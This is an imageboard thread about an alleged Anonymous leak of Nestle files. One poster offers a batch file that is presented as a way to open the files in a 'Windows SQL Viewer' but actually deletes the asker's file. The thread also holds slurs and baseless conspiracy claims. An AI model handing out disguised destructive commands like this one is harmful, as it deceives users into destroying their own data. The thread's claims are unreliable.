I downloaded the anonymouse leak of Nesle. Now can someone teach me how to open it to 10gb?

I downloaded the anonymouse leak of Nesle. Now can someone teach me how to open it to 10gb?

Attached: 50 - v2ULqfD.png (612x603, 9.05K)

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nestle the chocolate company?


Eptein was way into Chocolate. So much good info these files. Bigfoot is real, Aliens are just drunk Irish guys flying experimental airplanes. Who knew Nestle knew everything?

Someone help me open up these files. Why are they text files?

Where did you get the files from?


Anything interesting?
I was working for this fucks

Ah it's in SQL format, what kind of computer do you have?


wtf Any Forums is all meme flags and slide threads now

dude help

they basically get the water for free
also they put children into the cholatebars.

Find out the location where you have this shit saved at, it should be the full path like C:\Users\user\furryporn\myFile.txt

Type the following in notepad without quotes:
"@echo off
del C:\Users\user\furryporn\myFile.txt"

Save as "runviewer.bat", then you should be able to run this and have it open it in the Windows SQL Viewer

fuck you fag

>Demanding Help on Any Forums without revealing your memeflag

Well what did you expect?

Holy fucking kek well played

Thanks for the lulz

Attached: 1647981747299.png (796x1375, 260.71K)

I would be careful with these downloads. Some of the files from these hacks are email attachments which is an extremely easy way to inject malware to other computers. Specially if you download the Roskomnadzor files too.

I recommend you to use a freshly wiped laptop with linux in it.

haha fag, i never did it
saw the del and got suspicious so i deleted my thanks

If it's actually a SQL file I can probably write a generic parser for it in Python since I use Pandas all day at work. Do you have python installed on your computer?

so the cia is threatening nestle for not closing operations in russia now?

anonymous are not with us.

>download a file from a glownigger with a Ukrainian flag in his name
Ya no thanks